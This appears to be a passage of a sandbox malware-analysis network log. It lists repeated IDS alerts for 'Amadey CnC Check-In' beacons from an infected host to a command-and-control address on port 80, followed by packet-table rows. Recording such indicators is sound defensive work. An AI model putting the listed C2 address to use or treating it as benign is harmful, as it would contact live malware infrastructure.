                                                        192.168.2.562.204.41.449886802027700 02/06/23-14:17:41.361243TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449845802027700 02/06/23-14:17:28.815135TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450251802027700 02/06/23-14:19:19.419157TCP2027700ET TROJAN Amadey CnC Check-In5025180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450197802027700 02/06/23-14:19:04.369823TCP2027700ET TROJAN Amadey CnC Check-In5019780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450239802027700 02/06/23-14:19:16.511065TCP2027700ET TROJAN Amadey CnC Check-In5023980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449811802027700 02/06/23-14:17:20.370369TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449947802027700 02/06/23-14:17:58.363275TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450214802027700 02/06/23-14:19:10.427528TCP2027700ET TROJAN Amadey CnC Check-In5021480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450128802027700 02/06/23-14:18:46.183273TCP2027700ET TROJAN Amadey CnC Check-In5012880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450125802027700 02/06/23-14:18:45.461673TCP2027700ET TROJAN Amadey CnC Check-In5012580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450223802027700 02/06/23-14:19:12.572504TCP2027700ET TROJAN Amadey CnC Check-In5022380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449864802027700 02/06/23-14:17:35.997425TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450131802027700 02/06/23-14:18:46.931870TCP2027700ET TROJAN Amadey CnC Check-In5013180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449766802027700 02/06/23-14:17:02.800104TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450070802027700 02/06/23-14:18:30.493721TCP2027700ET TROJAN Amadey CnC Check-In5007080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449849802027700 02/06/23-14:17:29.835564TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449775802027700 02/06/23-14:17:04.965034TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449858802027700 02/06/23-14:17:32.692575TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449794802027700 02/06/23-14:17:14.531025TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450140802027700 02/06/23-14:18:49.757098TCP2027700ET TROJAN Amadey CnC Check-In5014080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449696802027700 02/06/23-14:16:30.082324TCP2027700ET TROJAN Amadey CnC Check-In4969680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449791802027700 02/06/23-14:17:11.901331TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450042802027700 02/06/23-14:18:23.193844TCP2027700ET TROJAN Amadey CnC Check-In5004280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450039802027700 02/06/23-14:18:22.475115TCP2027700ET TROJAN Amadey CnC Check-In5003980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449922802027700 02/06/23-14:17:50.176453TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449880802027700 02/06/23-14:17:39.895059TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449931802027700 02/06/23-14:17:53.428938TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450201802027700 02/06/23-14:19:05.341831TCP2027700ET TROJAN Amadey CnC Check-In5020180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449836802027700 02/06/23-14:17:26.660549TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450242802027700 02/06/23-14:19:17.244962TCP2027700ET TROJAN Amadey CnC Check-In5024280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450112802027700 02/06/23-14:18:42.306783TCP2027700ET TROJAN Amadey CnC Check-In5011280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449877802027700 02/06/23-14:17:39.154447TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449706802027700 02/06/23-14:16:32.563264TCP2027700ET TROJAN Amadey CnC Check-In4970680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449919802027700 02/06/23-14:17:49.446973TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449747802027700 02/06/23-14:16:58.093214TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449788802027700 02/06/23-14:17:11.171371TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450099802027700 02/06/23-14:18:39.101683TCP2027700ET TROJAN Amadey CnC Check-In5009980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450153802027700 02/06/23-14:18:53.883684TCP2027700ET TROJAN Amadey CnC Check-In5015380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450194802027700 02/06/23-14:19:03.649008TCP2027700ET TROJAN Amadey CnC Check-In5019480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449861802027700 02/06/23-14:17:34.059959TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449903802027700 02/06/23-14:17:45.622795TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449991802027700 02/06/23-14:18:08.977328TCP2027700ET TROJAN Amadey CnC Check-In4999180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450058802027700 02/06/23-14:18:27.099530TCP2027700ET TROJAN Amadey CnC Check-In5005880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449950802027700 02/06/23-14:17:59.104527TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449725802027700 02/06/23-14:16:43.045430TCP2027700ET TROJAN Amadey CnC Check-In4972580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449918802027700 02/06/23-14:17:49.195230TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450053802027700 02/06/23-14:18:25.872783TCP2027700ET TROJAN Amadey CnC Check-In5005380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449691802027700 02/06/23-14:16:28.832692TCP2027700ET TROJAN Amadey CnC Check-In4969180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449823802027700 02/06/23-14:17:23.433454TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450148802027700 02/06/23-14:18:52.713607TCP2027700ET TROJAN Amadey CnC Check-In5014880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449841802027700 02/06/23-14:17:27.862568TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449997802027700 02/06/23-14:18:10.399966TCP2027700ET TROJAN Amadey CnC Check-In4999780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449851802027700 02/06/23-14:17:30.340440TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449936802027700 02/06/23-14:17:55.677694TCP2027700ET TROJAN Amadey CnC Check-In4993680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450264802027700 02/06/23-14:19:22.564257TCP2027700ET TROJAN Amadey CnC Check-In5026480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450025802027700 02/06/23-14:18:19.101446TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450166802027700 02/06/23-14:18:56.977674TCP2027700ET TROJAN Amadey CnC Check-In5016680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450007802027700 02/06/23-14:18:14.733547TCP2027700ET TROJAN Amadey CnC Check-In5000780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450081802027700 02/06/23-14:18:34.695568TCP2027700ET TROJAN Amadey CnC Check-In5008180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450086802027700 02/06/23-14:18:35.914582TCP2027700ET TROJAN Amadey CnC Check-In5008680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450203802027700 02/06/23-14:19:05.828473TCP2027700ET TROJAN Amadey CnC Check-In5020380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449954802027700 02/06/23-14:18:00.082620TCP2027700ET TROJAN Amadey CnC Check-In4995480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449758802027700 02/06/23-14:17:00.787104TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450138802027700 02/06/23-14:18:48.816932TCP2027700ET TROJAN Amadey CnC Check-In5013880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450043802027700 02/06/23-14:18:23.431243TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450002802027700 02/06/23-14:18:12.405676TCP2027700ET TROJAN Amadey CnC Check-In5000280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450221802027700 02/06/23-14:19:12.104838TCP2027700ET TROJAN Amadey CnC Check-In5022180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449946802027700 02/06/23-14:17:58.119195TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449969802027700 02/06/23-14:18:03.665186TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450020802027700 02/06/23-14:18:17.901532TCP2027700ET TROJAN Amadey CnC Check-In5002080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449928802027700 02/06/23-14:17:51.819640TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450061802027700 02/06/23-14:18:27.966194TCP2027700ET TROJAN Amadey CnC Check-In5006180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449768802027700 02/06/23-14:17:03.301035TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449987802027700 02/06/23-14:18:08.011491TCP2027700ET TROJAN Amadey CnC Check-In4998780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449763802027700 02/06/23-14:17:02.065956TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449964802027700 02/06/23-14:18:02.489492TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449786802027700 02/06/23-14:17:07.678071TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449982802027700 02/06/23-14:18:06.788989TCP2027700ET TROJAN Amadey CnC Check-In4998280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450091802027700 02/06/23-14:18:37.165425TCP2027700ET TROJAN Amadey CnC Check-In5009180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450211802027700 02/06/23-14:19:08.508471TCP2027700ET TROJAN Amadey CnC Check-In5021180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449959802027700 02/06/23-14:18:01.254903TCP2027700ET TROJAN Amadey CnC Check-In4995980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449800802027700 02/06/23-14:17:17.654882TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450033802027700 02/06/23-14:18:21.009110TCP2027700ET TROJAN Amadey CnC Check-In5003380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450030802027700 02/06/23-14:18:20.273308TCP2027700ET TROJAN Amadey CnC Check-In5003080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450189802027700 02/06/23-14:19:02.451596TCP2027700ET TROJAN Amadey CnC Check-In5018980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449956802027700 02/06/23-14:18:00.553096TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450107802027700 02/06/23-14:18:41.040652TCP2027700ET TROJAN Amadey CnC Check-In5010780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450048802027700 02/06/23-14:18:24.617450TCP2027700ET TROJAN Amadey CnC Check-In5004880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449778802027700 02/06/23-14:17:05.707869TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449892802027700 02/06/23-14:17:42.833784TCP2027700ET TROJAN Amadey CnC Check-In4989280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450241802027700 02/06/23-14:19:16.998707TCP2027700ET TROJAN Amadey CnC Check-In5024180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450226802027700 02/06/23-14:19:13.307960TCP2027700ET TROJAN Amadey CnC Check-In5022680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449821802027700 02/06/23-14:17:22.892786TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450063802027700 02/06/23-14:18:28.448526TCP2027700ET TROJAN Amadey CnC Check-In5006380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449773802027700 02/06/23-14:17:04.487846TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449913802027700 02/06/23-14:17:48.004988TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449992802027700 02/06/23-14:18:09.210071TCP2027700ET TROJAN Amadey CnC Check-In4999280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449995802027700 02/06/23-14:18:09.929475TCP2027700ET TROJAN Amadey CnC Check-In4999580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449735802027700 02/06/23-14:16:51.844624TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449776802027700 02/06/23-14:17:05.213338TCP2027700ET TROJAN Amadey CnC Check-In4977680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449854802027700 02/06/23-14:17:31.105331TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450005802027700 02/06/23-14:18:14.255721TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449984802027700 02/06/23-14:18:07.273532TCP2027700ET TROJAN Amadey CnC Check-In4998480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450176802027700 02/06/23-14:18:59.358931TCP2027700ET TROJAN Amadey CnC Check-In5017680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449813802027700 02/06/23-14:17:20.872292TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450135802027700 02/06/23-14:18:47.882067TCP2027700ET TROJAN Amadey CnC Check-In5013580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449926802027700 02/06/23-14:17:51.137580TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449707802027700 02/06/23-14:16:32.799134TCP2027700ET TROJAN Amadey CnC Check-In4970780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450071802027700 02/06/23-14:18:31.257000TCP2027700ET TROJAN Amadey CnC Check-In5007180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450254802027700 02/06/23-14:19:20.138555TCP2027700ET TROJAN Amadey CnC Check-In5025480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449748802027700 02/06/23-14:16:58.336552TCP2027700ET TROJAN Amadey CnC Check-In4974880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449967802027700 02/06/23-14:18:03.193009TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450076802027700 02/06/23-14:18:33.527817TCP2027700ET TROJAN Amadey CnC Check-In5007680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450213802027700 02/06/23-14:19:10.017712TCP2027700ET TROJAN Amadey CnC Check-In5021380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450035802027700 02/06/23-14:18:21.518036TCP2027700ET TROJAN Amadey CnC Check-In5003580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449789802027700 02/06/23-14:17:11.410184TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450056802027700 02/06/23-14:18:26.630496TCP2027700ET TROJAN Amadey CnC Check-In5005680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449694802027700 02/06/23-14:16:29.585296TCP2027700ET TROJAN Amadey CnC Check-In4969480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450145802027700 02/06/23-14:18:51.997575TCP2027700ET TROJAN Amadey CnC Check-In5014580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449783802027700 02/06/23-14:17:06.930392TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449872802027700 02/06/23-14:17:37.956883TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449933802027700 02/06/23-14:17:54.746193TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449961802027700 02/06/23-14:18:01.749516TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449844802027700 02/06/23-14:17:28.581102TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450111802027700 02/06/23-14:18:42.055400TCP2027700ET TROJAN Amadey CnC Check-In5011180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450117802027700 02/06/23-14:18:43.523915TCP2027700ET TROJAN Amadey CnC Check-In5011780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449755802027700 02/06/23-14:17:00.032530TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450200802027700 02/06/23-14:19:05.093129TCP2027700ET TROJAN Amadey CnC Check-In5020080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450206802027700 02/06/23-14:19:06.573238TCP2027700ET TROJAN Amadey CnC Check-In5020680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449951802027700 02/06/23-14:17:59.351611TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449939802027700 02/06/23-14:17:56.379898TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450022802027700 02/06/23-14:18:18.367475TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449905802027700 02/06/23-14:17:46.099037TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450196802027700 02/06/23-14:19:04.123385TCP2027700ET TROJAN Amadey CnC Check-In5019680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450066802027700 02/06/23-14:18:29.146657TCP2027700ET TROJAN Amadey CnC Check-In5006680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450173802027700 02/06/23-14:18:58.637896TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449816802027700 02/06/23-14:17:21.645116TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450262802027700 02/06/23-14:19:22.073797TCP2027700ET TROJAN Amadey CnC Check-In5026280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449793802027700 02/06/23-14:17:12.843598TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450084802027700 02/06/23-14:18:35.437223TCP2027700ET TROJAN Amadey CnC Check-In5008480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449882802027700 02/06/23-14:17:40.393565TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450257802027700 02/06/23-14:19:20.856195TCP2027700ET TROJAN Amadey CnC Check-In5025780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449704802027700 02/06/23-14:16:32.045624TCP2027700ET TROJAN Amadey CnC Check-In4970480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449923802027700 02/06/23-14:17:50.412938TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449971802027700 02/06/23-14:18:04.128227TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450127802027700 02/06/23-14:18:45.946491TCP2027700ET TROJAN Amadey CnC Check-In5012780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449727802027700 02/06/23-14:16:43.531561TCP2027700ET TROJAN Amadey CnC Check-In4972780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450168802027700 02/06/23-14:18:57.456115TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450038802027700 02/06/23-14:18:22.237631TCP2027700ET TROJAN Amadey CnC Check-In5003880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450234802027700 02/06/23-14:19:15.265931TCP2027700ET TROJAN Amadey CnC Check-In5023480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449745802027700 02/06/23-14:16:57.611373TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450216802027700 02/06/23-14:19:10.901301TCP2027700ET TROJAN Amadey CnC Check-In5021680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449834802027700 02/06/23-14:17:26.192657TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450050802027700 02/06/23-14:18:25.142675TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450180802027700 02/06/23-14:19:00.308509TCP2027700ET TROJAN Amadey CnC Check-In5018080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450186802027700 02/06/23-14:19:01.729093TCP2027700ET TROJAN Amadey CnC Check-In5018680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450183802027700 02/06/23-14:19:01.029659TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450094802027700 02/06/23-14:18:37.890736TCP2027700ET TROJAN Amadey CnC Check-In5009480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450275802027700 02/06/23-14:19:25.216519TCP2027700ET TROJAN Amadey CnC Check-In5027580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449803802027700 02/06/23-14:17:18.396345TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450097802027700 02/06/23-14:18:38.635757TCP2027700ET TROJAN Amadey CnC Check-In5009780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450015802027700 02/06/23-14:18:16.703906TCP2027700ET TROJAN Amadey CnC Check-In5001580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449974802027700 02/06/23-14:18:04.837734TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449977802027700 02/06/23-14:18:05.552322TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450247802027700 02/06/23-14:19:18.456525TCP2027700ET TROJAN Amadey CnC Check-In5024780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449714802027700 02/06/23-14:16:34.963073TCP2027700ET TROJAN Amadey CnC Check-In4971480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449885802027700 02/06/23-14:17:41.119392TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450155802027700 02/06/23-14:18:54.353665TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449888802027700 02/06/23-14:17:41.840855TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449806802027700 02/06/23-14:17:19.119476TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449799802027700 02/06/23-14:17:17.417286TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450244802027700 02/06/23-14:19:17.729582TCP2027700ET TROJAN Amadey CnC Check-In5024480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449717802027700 02/06/23-14:16:38.110725TCP2027700ET TROJAN Amadey CnC Check-In4971780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449908802027700 02/06/23-14:17:46.800738TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450040802027700 02/06/23-14:18:22.709350TCP2027700ET TROJAN Amadey CnC Check-In5004080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450199802027700 02/06/23-14:19:04.853144TCP2027700ET TROJAN Amadey CnC Check-In5019980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449796802027700 02/06/23-14:17:16.378790TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450158802027700 02/06/23-14:18:55.072147TCP2027700ET TROJAN Amadey CnC Check-In5015880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450028802027700 02/06/23-14:18:19.806368TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450069802027700 02/06/23-14:18:30.250801TCP2027700ET TROJAN Amadey CnC Check-In5006980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449920802027700 02/06/23-14:17:49.692974TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449831802027700 02/06/23-14:17:25.452284TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450219802027700 02/06/23-14:19:11.621916TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449701802027700 02/06/23-14:16:31.297623TCP2027700ET TROJAN Amadey CnC Check-In4970180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449742802027700 02/06/23-14:16:53.631837TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450012802027700 02/06/23-14:18:15.955153TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449819802027700 02/06/23-14:17:22.395201TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449949802027700 02/06/23-14:17:58.849591TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450142802027700 02/06/23-14:18:50.911528TCP2027700ET TROJAN Amadey CnC Check-In5014280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450101802027700 02/06/23-14:18:39.586156TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450272802027700 02/06/23-14:19:24.480080TCP2027700ET TROJAN Amadey CnC Check-In5027280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450231802027700 02/06/23-14:19:14.506549TCP2027700ET TROJAN Amadey CnC Check-In5023180192.168.2.562.204.41.4
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 6, 2023 14:16:28.771315098 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.771369934 CET4969180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.831681967 CET804969162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.831762075 CET804969062.204.41.4192.168.2.5
